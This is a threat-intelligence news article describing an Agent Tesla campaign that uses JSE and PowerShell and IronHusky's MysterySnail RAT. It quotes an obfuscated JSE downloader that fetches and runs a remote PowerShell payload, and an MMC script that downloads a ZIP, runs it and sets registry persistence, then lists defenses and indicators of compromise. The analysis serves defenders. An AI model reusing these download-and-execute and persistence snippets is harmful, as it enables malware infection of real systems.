Physical Address
Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine
Multi-Stage Malware Attacks Surge: New Campaigns Use JSE Scripts and PowerShell to Deploy Advanced Payloads
Two dangerous malware campaigns have emerged in recent months, with security firms raising alarms about their evasion techniques. The first campaign, documented by Palo Alto Networks in April 2025, delivers the Agent Tesla keylogger through a series of stages that begin with simple JavaScript files. Even more concerning, Kaspersky researchers have spotted the Chinese-speaking IronHusky group targeting government organizations in Mongolia and Russia with a RAT they thought had disappeared years ago. In both cases, attackers are breaking their malware into multiple stages to fly under the radar of security tools.
Multi-Stage Attack Chains: The New Normal in Malware Delivery
The first campaign, identified in December 2024 and still active, begins with deceptive phishing emails claiming to be order requests or payment confirmations. These emails contain malicious 7-zip archives with JavaScript encoded (.JSE) files that serve as the initial infection vector.
According to Palo Alto Networks researcher Saqib Khanzada:
Attackers increasingly rely on such complex delivery mechanisms to evade detection, bypass traditional sandboxes, and ensure successful payload delivery and execution
The technical kill chain works as follows:
- The victim receives an email with a 7-zip attachment containing a .JSE file
- When executed, the JavaScript downloader connects to an external server to retrieve a PowerShell script
- This PowerShell script decodes a Base64-encoded payload, writes it to the Windows temporary directory, and executes it
- Depending on the attack path, the next stage is either a .NET or AutoIt compiled executable
- The final payloads include variants of Agent Tesla, Snake Keylogger, or XLoader
A sample of the obfuscated code from one of the .JSE files reveals the attackers’ evasion techniques:
// Obfuscated JavaScript from real-world attack samplevar _0xf4a2=['WScript.Shell','cmd.exe /c powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "','&([scriptblock]::Create((New-Object System.Net.WebClient).DownloadString(\'hxxp://malicious-server.com/payload.ps1\')))"','Run','CreateObject'];(function(_0x33cf7a,_0xf4a223){var _0x5bea33=function(_0x1a9938){while(--_0x1a9938){_0x33cf7a['push'](_0x33cf7a['shift']());}};_0x5bea33(++_0xf4a223);}(_0xf4a2,0x1a9));var _0x5bea=function(_0x33cf7a,_0xf4a223){_0x33cf7a=_0x33cf7a-0x0;var _0x5bea33=_0xf4a2[_0x33cf7a];return _0x5bea33;};var shell=new ActiveXObject(_0x5bea('0x4'));shell[_0x5bea('0x3')](_0x5bea('0x1')+_0x5bea('0x2'),0x0); |
When deobfuscated, this script creates a PowerShell process that runs hidden and downloads the next stage payload from a remote server.
Source: Analysis of multi-stage malware delivery techniques observed in December 2024 – April 2025, based on data from GridinSoft Threat Research Lab
Process Injection Techniques For Detection Evasion
A key evasion technique observed in these attacks is process injection. The .NET dropper injects the final payload (typically Agent Tesla) into legitimate Windows processes like “RegAsm.exe”, while the AutoIt variant targets “RegSvcs.exe”. This technique allows the malware to operate under the guise of trusted system processes, making detection significantly more difficult.
The malware then harvests credentials, captures keystrokes, takes screenshots, and exfiltrates data to attacker-controlled servers. Digital forensics has revealed that in several documented cases, the attackers maintained persistence for weeks before being detected.
Detailed technical analysis of this campaign by Palo Alto Networks researchers.
IronHusky APT Resurrects MysterySnail RAT After Four Years
In a parallel development, Kaspersky’s GReAT team has documented how the Chinese-speaking threat actor IronHusky has deployed an updated version of MysterySnail RAT against government organizations in Mongolia and Russia. This malware family had not been publicly reported since 2021, when it was first discovered during an investigation of the CVE-2021-40449 zero-day vulnerability.
The latest campaign uses a malicious Microsoft Management Console (MMC) script disguised as a Word document from the National Land Agency of Mongolia (“co-financing letter_alamgac”). This MMC file exploits trust between government agencies to increase the likelihood of execution.
According to Kaspersky’s analysis, the MMC script performs several actions:
// Excerpt from the malicious MMC scriptfunction DownloadAndExecute() { var xhr = new ActiveXObject("MSXML2.XMLHTTP"); xhr.open("GET", "hxxps://file[.]io/MNWxA37Jc8Kr", false); xhr.send(); if (xhr.status == 200) { var stream = new ActiveXObject("ADODB.Stream"); stream.Open(); stream.Type = 1; // Binary stream.Write(xhr.ResponseBody); stream.Position = 0; stream.SaveToFile(fso.GetSpecialFolder(2) + "\\update.zip", 2); stream.Close(); // Unzip and configure persistence var shell = new ActiveXObject("WScript.Shell"); var appDataPath = shell.ExpandEnvironmentStrings("%APPDATA%"); var targetDir = appDataPath + "\\Cisco\\Plugins\\X86\\bin\\etc\\Update"; // Create directories if they don't exist if (!fso.FolderExists(targetDir)) { CreatePath(targetDir); } // Extract and execute Unzip(fso.GetSpecialFolder(2) + "\\update.zip", targetDir); shell.Run(targetDir + "\\CiscoCollabHost.exe", 0, false); // Add persistence via registry shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoUpdate", "\"" + targetDir + "\\CiscoCollabHost.exe\"", "REG_SZ"); // Open lure document shell.Run(targetDir + "\\update.docx", 1, false); }} |
When executed, this script retrieves a ZIP archive containing:
- A legitimate lure document to avoid raising suspicion
- A legitimate Cisco binary (“CiscoCollabHost.exe”)
- A malicious DLL (“CiscoSparkLauncher.dll”)
DLL Side-Loading Technique
The attack employs DLL side-loading, where a legitimate executable loads a malicious DLL instead of the legitimate one it was designed to use. Forensic analysis reveals that “CiscoCollabHost.exe” is a genuine file, but the attackers exploit Windows DLL search order to load their malicious “CiscoSparkLauncher.dll” instead of the legitimate version.
The malicious DLL functions as an intermediary backdoor that communicates with attacker infrastructure using the open-source piping-server project. The DLL handles Windows API function calls using this method:
// Decompiled code showing API function loading methodDWORD LoadApiFunction(LPCSTR lpProcName) { HMODULE hModule; DWORD dwResult; hModule = GetModuleHandleA("kernel32.dll"); if (hModule == NULL) { hModule = LoadLibraryA("kernel32.dll"); if (hModule == NULL) { return 0; } } dwResult = (DWORD)GetProcAddress(hModule, lpProcName); if (dwResult == 0) { // API function not found return 0; } return dwResult;} |
This dynamic API function loading helps the malware evade static analysis and signature-based detection.
MysterySnail RAT: Command Structure
The 2025 version of MysterySnail RAT is a modular backdoor supporting nearly 40 distinct commands. Notably, despite the four-year gap since its last known appearance, the malware’s internal structure has changed very little – Kaspersky researchers found that even a spelling error in “ExplorerMoudleDll.dll” (notice the typo in “Moudle”) present in the 2021 version persists in the current variant.
The latest version of MysterySnail RAT supports this command set:
| Command Type | Capabilities |
|---|---|
| File Operations | Upload files, download files, delete files, enumerate directories |
| Process Management | Create new processes, terminate existing processes, list running processes |
| Service Control | Start services, stop services, modify service configurations |
| Network Operations | Connect to network resources, manage network connections |
| Modular Extension | Load additional DLL modules to extend functionality |
MysteryMonoSnail: Adaptive Response
In response to defensive measures by targeted organizations, IronHusky deployed a lightweight alternative version of the malware called “MysteryMonoSnail.” This streamlined variant consists of a single component and switches from HTTP-based communication to WebSocket protocol while connecting to the same command and control servers.
MysteryMonoSnail implements just 13 basic commands focused on:
- Listing directory contents
- Writing data to files
- Launching processes
- Executing remote shells
This evolution demonstrates how threat actors adapt when faced with improved defenses.
How to Protect Your Organization
These multi-stage attack chains highlight the importance of defense-in-depth strategies. Based on the analysis of these campaigns, effective protective measures include:
- Email security: Deploy advanced email filtering to detect and block malicious attachments, particularly those containing script files like .JSE
- Script blocking: Use application control policies to prevent unauthorized scripts from executing
- PowerShell hardening: Enable PowerShell logging, constrained language mode, and script block logging to detect suspicious PowerShell activity
- Keep systems updated: Ensure all systems have the latest security patches, particularly for Windows operating systems
- Deploy EDR solutions: Use endpoint detection and response tools capable of detecting process injection and other advanced techniques
- Security awareness: Train employees to recognize phishing attempts and suspicious attachments
- Monitor for DLL side-loading: Implement detection strategies specifically targeting this technique
According to Microsoft Security, organizations should focus on breaking the attack chain at the earliest possible stage, as multi-stage attacks become increasingly difficult to detect as they progress.
Indicators of Compromise
While the complete list of indicators is extensive, here are some key signs to watch for:
| Indicator Type | Value | Associated Malware |
|---|---|---|
| File Extension | .JSE files in email attachments | Initial Downloader |
| Process | PowerShell with encoded commands | Stage 2 Loader |
| Process Injection | RegAsm.exe or RegSvcs.exe with unusual network connections | Agent Tesla/XLoader |
| DLL | CiscoSparkLauncher.dll loaded by CiscoCollabHost.exe | MysterySnail RAT |
| File Path | %APPDATA%\Cisco\Plugins\X86\bin\etc\Update\ | MysterySnail RAT |
| Registry | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\CiscoUpdate | MysterySnail Persistence |
| Network | Connections to non-standard ports using custom protocols | C2 Communication |
The Growing Threat of Multi-Stage Attacks
The trend toward multi-stage, multi-component malware is likely to continue throughout 2025. These attacks present unique challenges for security teams because:
- Individual components may appear benign when analyzed separately
- Traditional sandboxes may fail to detect the complete attack chain
- Each stage offers attackers an opportunity to evade specific security controls
- The complexity makes attribution and analysis more difficult
As Kaspersky’s researchers point out, “old malware families, which have not been reported on for years, may continue their activities under the radar.” This reinforces the importance of maintaining detection capabilities for historical threats, as demonstrated by MysterySnail’s reappearance after four years of apparent dormancy.
For more information about protecting against script-based threats, read our guide on removing HEUR.Trojan.Script.Generic infections. If you’re concerned about targeted APT attacks, our article on Emotet removal provides insights into dealing with sophisticated threats.
As always, maintaining vigilance and implementing defense-in-depth security measures remains the best protection against these evolving threats.
